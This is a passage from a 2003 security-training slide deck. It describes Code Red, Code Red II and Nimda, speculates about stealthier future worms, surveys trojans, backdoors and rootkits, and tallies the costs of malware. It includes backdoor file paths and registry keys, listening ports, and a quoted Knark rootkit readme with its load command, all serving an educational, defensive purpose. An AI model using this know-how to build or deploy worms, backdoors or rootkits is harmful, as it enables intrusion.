targeting random IP addresses.
• The worm sends its code as an HTTP request.
The HTTP request exploits a known bufferoverflow vulnerability, which allows the
worm to run on your computer.
• Use in-memory copy
SECURITY INNOVATION ©2003
W32/Bady.worm (Code Red)
Payload
• Denial of Service by sending large amounts of junk
data to port 80 (Web service) of 198.137.240.91, which
was www.whitehouse.gov. This IP address has been
changed and is no longer active.
• If the default language of the computer is U.S.
English, further threads cause Web pages to appear
defaced. First, the thread sleeps two hours and then
hooks a function, which responds to HTTP requests.
Instead of returning the correct Web page, the worm
returns its own HTML code. web page delivery
SECURITY INNOVATION ©2003
W32/Bady.worm (Code Red)
SECURITY INNOVATION ©2003
Code Red II
Infection
• Exploits security vulnerability with idq.dll that contains an
unchecked buffer in a section of code that handles input URLs.
Idq.dll runs in the System context, so exploiting the vulnerability
gives the attacker complete control of the server.
• The worm first calls its initialization routine, which identifies the
base address of Kernel32.dll in the process address space of the
IIS Server service.
• It then loads WS2_32.dll to access functions such as socket,
closesocket and WSAGetLastError. From User32.dll, it gets
ExitWindowsEx that is used by the worm to reboot the system.
• The main thread checks for two different markers. The first
marker, "29A," controls the installation of the Trojan.VirtualRoot.
The other marker is a semaphore named "CodeRedII." If the
semaphore exists, the worm goes into an infinite sleep.
SECURITY INNOVATION ©2003
Code Red II
Propagation
• If the default language is Chinese (either
Taiwan or PRC), it creates 600 new threads;
otherwise, it creates 300. These threads
generate random IP addresses which are used
to search for new Web servers to infect.
• Statistical distribution of random address,
favoring topologically closer hosts
SECURITY INNOVATION ©2003
Code Red II
Payload
• The Trojan (C:\Explorer.exe) sleeps for a few minutes and resets these
keys to assure that the registry keys are modified.
• If the Trojan that is dropped by the worm has modified the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\
Services\W3SVC\Parameters\Virtual Roots
(by adding a few new keys and setting the user group to 217), it allows a
hacker to take full control of the Web server by sending an HTTP GET
request to run scripts/root.exe on the infected Web server.
• Copies Cmd.exe from the Windows NT \System folder to the following
folders (if they exist).
–
–
–
–
C:\Inetpub\Scripts\Root.exe
D:\Inetpub\Scripts\Root.exe
C:\Progra~1\Common~1\System\MSADC\Root.exe
D:\Progra~1\Common~1\System\MSADC\Root.exe
SECURITY INNOVATION ©2003
W32.Nimda.A@mm
Infection
• The worm uses the Unicode Web Traversal exploit
• The worm is started as ADMIN.DLL on infected
webservers. The worm starts to scan and infect files
on all available drives including removable and
network ones. The EXE files (except WINZIP32.EXE)
on these drives will get infected with the worm.
• The infection technique is unique - the worm puts an
infected file inside its body as a resource. When the
infected file is run, the worm extracts the embedded
original EXE file, runs it and tries to delete it
afterwards. If instant deletion is not possible, the
worm creates WININIT.INI file that will delete the
extracted file on next Windows startup.
SECURITY INNOVATION ©2003
W32.Nimda.A@mm
Propagation
• The worm searches trough all the '.htm' and '.html'
file in the Temporary Internet Files folder for e-mail
addresses. It reads trough user's inbox and collects
the sender addresses. When the address list is ready it
uses it's own SMTP engine to send the infected
messages.
• The worm uses backdoors on IIS servers such as the
one CodeRed II installs. It scans random IP addresses
for these backdoors. When a host is found to have one
the worm instructs the machine to download the
worm code (Admin.dll) from the host used for
scanning. After this it executes the worm on the target
machine this way infecting it.
SECURITY INNOVATION ©2003
W32.Nimda.A@mm
Payload
• Payload:
– Large scale e-mailing: Uses MAPI to send itself out
as Readme.exe (Readme.exe may NOT be visible
as an attachment in the email received)
– Modifies files: Replaces multiple legitimate files
with itself.
– Degrades performance: May cause system
slowdown
– Compromises security settings: Opens the C drive
as a network share
SECURITY INNOVATION ©2003
W32.Nimda.A@mm
• On September 20, 2001 1200 computers at the
Fairfax County Library were hit by the Nimda
virus forcing all of them off the network. 150
technicians from Virginia’s Department of
Information Technology were called in to help
deal with cleaning the computers – from 30
minutes to 3 hours each!
SECURITY INNOVATION ©2003
The Future of Worms
• Client and Server-Side Flaws
–
–
–
–
–
Buffer overflows
Format string attacks
Design flaws
Open shares
Misconfigurations
SECURITY INNOVATION ©2003
Current Limitations
•
•
•
•
Limited capabilities
Growth and traffic patterns
Network structure
Intelligence Database
SECURITY INNOVATION ©2003
Limited Capabilities: Recon
RPC
Target
Target
IIS
FTP
Target
Target
LPD
Target
SNMP
Target
SECURITY INNOVATION ©2003
Limited Capabilities: Attack
?
1
if {1|2|3}
attack
2
else
abort
3
end
SECURITY INNOVATION ©2003
Target
Network Structure
Late
Early
SECURITY INNOVATION ©2003
Network Topology
Early
Late
SECURITY INNOVATION ©2003
Limitations of Directionality
Target Network
SECURITY INNOVATION ©2003
Intelligence Database
N
N
N
N
N
N
N
I
I
SECURITY INNOVATION ©2003
Limitations Conclusions
• Highly visible
• Easily Blocked
– need a signature
• Unable to achieve a specific target
• Readily caught
SECURITY INNOVATION ©2003
Future Considerations
•
•
•
•
•
•
•
Dynamic behavior
Dynamic updates
Communications mechanisms
Infection mechanisms
Network topologies
Communications topology
New targets
SECURITY INNOVATION ©2003
Dynamic Behavior
TCP
NNTP
53/UDP
ICMP 8.0
GRE
TCP/80
SECURITY INNOVATION ©2003
SMTP
Dynamic Behavior
Communications
Attacks
Platforms
Dynamic invocation of capabilities
SECURITY INNOVATION ©2003
Dynamic Network Roles
I
R
A
Target
Not every node contains all components
SECURITY INNOVATION ©2003
Updates to the Nodes
Release
Retrieve
SECURITY INNOVATION ©2003
Embedding Messages
• Images
• Text
• MP3 files
• Usenet, web, mailing lists
• Freenet, Gnutella, Napster
SECURITY INNOVATION ©2003
New Targets
• Embedded devices
– bugs
– prevalence on broadband
• Large audience targets
– Akamai clients
– Political, financial motivations
SECURITY INNOVATION ©2003
The Future of Worms
Encryption/Obfuscation/Polymorphism
• Covert Channel / Stealth Worms
–
–
–
–
Hiding in plain sight
ICMP
Encoding in normal data stream
Nonstandard
SECURITY INNOVATION ©2003
The Future of Worms
Encryption/Obfuscation/Polymorphism
• Keyed Payloads
– Keying a worm before sending, requiring the
worm to “call back” to decode itself.
– Clear text worm never transmits
– Higher chance of missing key transmissions, less
likely to get a worm to disassemble
SECURITY INNOVATION ©2003
The Future of Worms
Encryption/Obfuscation/Polymorphism
• Standard Polymorphic/Mutation Techniques
–
–
–
–
Worms meet viruses
Continuously changing itself
Brute forcing new offsets
Adapting to the environment to become “more fit”
SECURITY INNOVATION ©2003
The Future of Worms
“Andy Warhole”
• Flash Worms
– Faster, more accurate spread
– Complete spread of all possible targets in 5-20
minutes
– Very low false positive rate
– Too fast to analyze/disseminate information
SECURITY INNOVATION ©2003
The Future of Worms
Intelligent Worms
• Worms meet AI
– Worm infected hosts communicating in a p2p
method
– Exchanging information on targeting, propagation,
or new infection methods
– Agent-like behavior
SECURITY INNOVATION ©2003
The Future of Worms
Intelligent Worms
•
•
•
•
Intelligence Database
Knowledge of other nodes
Concrete vs. abstract
Complete vs. incomplete
SECURITY INNOVATION ©2003
The Future of Worms
Bigger Scope
• Multi-Platform / OS Worms
– Multi-OS shell code
– Attacking multiple different vulnerabilities on
multiple platforms
– Single worm code, large attackable base
SECURITY INNOVATION ©2003
Trojans
From Quick
Thinking Greeks …
to Quick Thinking
Geeks
Yeah, but what’s a Trojan?
• A small program that is designed to appear desirable but is in fact
malicious
• Must be run by the user
• Do not replicate themselves
• Used to take over a computer, or steal/delete data
• Good Trojans will not:
– alert the user
– alter the way their computer works
SECURITY INNOVATION ©2003
Trojan Horses
• A program which appears to be legitimate,
but performs unintended actions.
• Trojan Horses can install backdoors, perform
malicious scanning, monitor system logins
and other malicious activities.
SECURITY INNOVATION ©2003
Trojans
• An easy weapon for script-kiddies to wreak havoc on the
Internet.
• They are a program that hides behind a potentially valuable or
entertaining program. Trojan horses can be viruses or remote
control programs that provide complete access to a victim’s
computer.
• I was first introduced to one that grabbed passwords on a VAX
computer. Someone had written code that mimicked the logon
screen and sequence… upon accepting your UserID and
password, the owner’s account would issue a “improper
occurrence” warning, and reboot the workstation… then I was
able to log on regularly… but my User ID and password were
now in a data file owned by the perpetrator.
SECURITY INNOVATION ©2003
Trojans
• Majority of modern trojan horses are backdoor
utilities
– Sub Seven
– Netbus
– Back Orifice
• Feature set usually includes remote control,
desktop viewing, http/ftp server, file sharing,
password collecting, port redirection
• Some of these trojan horses can be used as
legitimate remote administration tools
• Other trojans are mostly programs that
steal/delete data or can drop viruses
SECURITY INNOVATION ©2003
Windows Backdoors
•
•
•
•
•
Back Orifice
Back Orifice 2000 (BO2K)
NetBus
WinVNC (Virtual Network Computing)
SubSeven
SECURITY INNOVATION ©2003
Back Doors
• A Backdoor allows a malicious attacker to
maintain privileged access to a compromised
host
• Unix back doors are typically installed via a
Worm, Root Kit or manually after a system
has been initially compromised
• Windows back doors are typically installed
via a Virus, Worm or Trojan Horse.
– Virus and Worms via Email, sharing infected files,
Open Windows shares
– Trojan Horses typically included with
“legitimate” application such as a game etc.
SECURITY INNOVATION ©2003
Back Orifice/BO2k
• A “Remote Administration” tool for windows 9x and
NT.
• Runs on remote system without user knowing
• Client can control several servers simultaneously
• Allows client complete control over server system
including logging all keystrokes at the console.
(Passwords, email, etc)
• By default server listens on tcp 54320 or udp 54321
SECURITY INNOVATION ©2003
Back Orifice/BO2k
• It sets itself to be automatically run, by modifying the
following Windows registry:
– HKEY_LOCAL_MACHINE\software\Microsoft\Windows\
CurrentVersion\vmgr.exe
– The "Data" field of this registry entry is set to,
"c:\Windows\vmgr.exe".
• Due to this, the Trojan is run at every Windows startup.
• It’s a remote control utility with extensive capabilities
that can operate on Windows 9X and Windows NT
systems using a client/server model. The server is
installed on the desired victim or remote system, and
the client is located on the local system.
SECURITY INNOVATION ©2003
Back Orifice/BO2k
• Besides opening and closing the CD drawer, it can:
–
–
–
–
–
–
–
–
–
turn on the microphone and record conversations
Turn on camera to record occurrences in room
create or modify registry keys
Log keystrokes
Create dialog boxes and type messages
reboot the machine
Get detailed system information
Gather passwords (Screensaver, Dialup, Network access)
Dumps hashed NT passwords from SAM database (for later
cracking in L0phtCrack)
– Copy, rename, delete, view, and search files and directories,
even change share attributes.
If BO2K can’t do it, then the many add-on’s
(always increasing) will be able to.
SECURITY INNOVATION ©2003
Back Orifice/BO2k
SECURITY INNOVATION ©2003
Back Oriface
SECURITY INNOVATION ©2003
Netbus
• Provides “Remote Administration” of Windows 9x
and NT systems
• Allows full control over windows and devices.
– (open and close windows remotely, Screen
capture, open and close CDROM tray)
• Logs keystrokes
• Listens on TCP/UDP 12345 and 12346 (configurable v
1.7 and up) for connections
• Listens on TCP/UDP 20034 (v.2.x) for connections
SECURITY INNOVATION ©2003
Netbus
SECURITY INNOVATION ©2003
SubSeven
• Windows “remote administration” utility.
• Allows full control over windows and devices.
• Many features not found in other remote admin.
Tools
–
–
–
–
get Windows CD-Key
retrieve dialup usernames/passwords, phone numbers
AOL/Microsoft/Yahoo - IM spy
ICQ hijacking
SECURITY INNOVATION ©2003
SubSeven
SECURITY INNOVATION ©2003
SubSeven: Client
• Easy to use
interface
• Extremely
configurable
www.sub7files.com
SECURITY INNOVATION ©2003
SubSeven: Server
• Easy to use
interface
• Extremely
configurable
SECURITY INNOVATION ©2003
Amitis
Client
Server
SECURITY INNOVATION ©2003
Beast
Client
Server
SECURITY INNOVATION ©2003
Beast
The Registry Manager from where you can view and
edit the victim registry…an essential tool for the
remote administrator
SECURITY INNOVATION ©2003
Beast
• PDF Users Guide
• Full Documentation
• Bug Reporting….
SECURITY INNOVATION ©2003
Z-dem0n
SECURITY INNOVATION ©2003
Trojans - Jokes
One time this guy walks into a bar…
• Newest category of trojans
• Designed to look extremely malicious and are visual
to the user
• Don’t really do anything at all
SECURITY INNOVATION ©2003
…Others
Logic Bombs
• Designed to be extremely malicious
• Hard to detect
• Run after a certain amount of inactivity or in
the absence of a certain activity
• Engineered for maximum effect
• Ex. Some malicious logic bombs can take
advantage of an error in machine code and
start a processor on fire
SECURITY INNOVATION ©2003
Logic Bombs
• Tim Lloyd, Omega Engineering Corporation
• July 31, 1996 a logic bomb executed causing a
loss of its key manufacturing programs
resulting in a loss of more than $10 million.
• 6 lines of code
– deltree.exe modified to zzzz read “fixing” instead
of “deleting”.
– Used Purge F:\
SECURITY INNOVATION ©2003
Easter Eggs
Windows, PhotoShop 6
1. Open PhotoShop 6
2. hold down CTRL-ALT
3. go to Help > About PhotoShop...
4. see the cat (Venus in Furs)
SECURITY INNOVATION ©2003
Easter Eggs
Windows, PhotoShop 6
1. Hold the Ctrl Alt key and open the About Photoshop option
2. The usual Electric Cat screen appears.
3. Wait several seconds for the credits to begin scrolling
4. Pressing the Alt key will speed them up...
5. Now, while they're speeding, click the big eye once...
6. While still holding the Alt key, press the Ctrl key
7. Let up on the Alt key.
8. About 60 secret messages will pop up above the scrolling credits
SECURITY INNOVATION ©2003
Easter Eggs
Windows, PhotoShop 6
1.Hold down the Option key
2.Choose "Palette Options..." from the Layers palette
3.Merlin window appears
SECURITY INNOVATION ©2003
Bizarre Code….
Why did the computer shut
down unexpectedly?
The computer got very poorly
and decided to end it’s own
suffering.
Makes you wonder what else is
hidden?
SECURITY INNOVATION ©2003
Unix Backdoors
• Backdoors on Unix are typically a shell bound to a
network port.
– A remote attacker can connect to the network port
and execute commands
• A trojaned daemon such as SSH (included in a root
kit) may provide root access without a password.
SECURITY INNOVATION ©2003
Root Kits
• A rootkit is a collection of tools that allows the hacker
to provide a backdoor to the system, collect
information about other hosts on the network, mask
the fact that the system is compromised
• Hides the intruder’s activity on the system
• Allows intruder to keep the privileged access
– NOT to initially obtain it
• Root Kits are Trojan Horses and typically provide a
Back Door.
• Most root kits can be detected by running an
integrity checker such as Tripwire
SECURITY INNOVATION ©2003
Root Kits
• Original Rootkit was distributed from bulletin boards…
–
–
the public remained unaware for a few years. Finally made
public in early ‘90s.
• Now WIDELY available for many platforms.
• Include an Ethernet sniffer to help find accesses to other servers.
• Once root privilege is obtained in Unix-based OS, then look to
trusted hosts.
• Modify key programs and overwrite them in the OS
• Newer “Kernel-based” rootkits are hard to detect (e.g., “Knark).
SECURITY INNOVATION ©2003
T0rn Kit
SECURITY INNOVATION ©2003
$_
./t0rn coded 5000
==============================================================
.oooo.
oooo
o8o
.
.o8
d8P''Y8b
'888
'''
.o8
.o888oo 888
888 oooo d8b ooo. .oo.
888 oooo oooo .o888oo
888
888
888 '888''8P '888P'Y88b 888 .8P'
'888 888
888
888
888 888
888 888 888888.
888 888
888 . '88b d88' 888
888 888 888 '88b. 888 888 .
'888'
'Y8bd8P' d888b
o888o o888o o888o o888o o888o '888'
=============================================================
SECURITY INNOVATION ©2003
Knark
• Kernel based root kit for Linux using Loadable Kernel
Module
• Hide files
• Hide running processes
• Hide active network connections
• Change the user and group permissions of running
processes
SECURITY INNOVATION ©2003
Knark
•
Knark is a kernel-based rootkit for Linux 2.2.
No part of knark may be used to break the law, or to cause damage of any
kind. And I'm not responsible for anything you do with it.
The heart of the package, knark.c, is a Linux lkm (loadable kernel-module).
Type "make" to compile knark and the programs included, and then "insmod
knark“ to load the lkm. When knark is loaded, the hidden directory /proc/knark
is created. The following files are created in this directory:
Creed
files
nethides
pids
redirects
shameless self-promotion banner :-)
list of hidden files on the system
list of strings hidden in /proc/net/[tcp|udp]
list of hidden pids, ps-like output
list of exec-redirection entries
SECURITY INNOVATION ©2003
NT Rootkit
• Windows NT or Windows 2000!
• Dynamically loadable kernel device driver.
• Features at a glance:
– Process hiding
– File hiding
– EXE redirection
SECURITY INNOVATION ©2003
NT Rootkit
• Process hiding
SECURITY INNOVATION ©2003
NT Rootkit
• File hiding
SECURITY INNOVATION ©2003
NT Rootkit
• Features continued…
– Hiding registry values
– Keyboard sniffer
– Rootkit console shell
SECURITY INNOVATION ©2003
NT Rootkit
• Rootkit console with Keyboard sniffing
SECURITY INNOVATION ©2003
The Cost of Maleware
• Money
– costs associated with hiring temporary staff to repair damage
and recover data
• Time
– staff time needed to repair damage, recover data, supervise
temps
• Reputation
– unexpected downtime (website and/or library) causes
patrons to go elsewhere
• Trust
– patron’s trust you with their personal information
– vendors trust you to authenticate your users
SECURITY INNOVATION ©2003
Money
• Omega Engineering 10 million dollars - logic
bomb
• 2000 - The ILOVEYOU and its copycats
caused $6.7 billion in damage in the first five
days.
SECURITY INNOVATION ©2003
Time
• On September 20, 2001 1200 computers at the
Fairfax County Library were hit by the Nimda
virus forcing all of them off the network. 150
technicians from Virginia’s Department of
Information Technology were called in to help
deal with cleaning the computers – from 30
minutes to 3 hours each!
SECURITY INNOVATION ©2003
Reputation
For Release: January 18, 2002
Eli Lilly Settles FTC Charges Concerning Security
Breach
Company Disclosed E-mail Addresses of 669
Subscribers to its Prozac Reminder Service
Eli Lilly and Company (Lilly) has agreed to settle
Federal Trade Commission charges regarding the
unauthorized disclosure of sensitive personal
information collected from consumers through its
Prozac.com Web site. As part of the settlement, Lilly
will take appropriate security measures to protect
consumers' privacy…
SECURITY INNOVATION ©2003
Trust
SECURITY INNOVATION ©2003
Trends
•
•
•
•
•
•
More sophisticated intruders
More sophisticated attack tools
“Time to Patch” time decreasing
Increasing permeability of firewalls
Increased ability to mount distributed attacks
Increased threat from infrastructure attacks
– DOS, worms, attacks on DNS system and router
based attacks
SECURITY INNOVATION ©2003
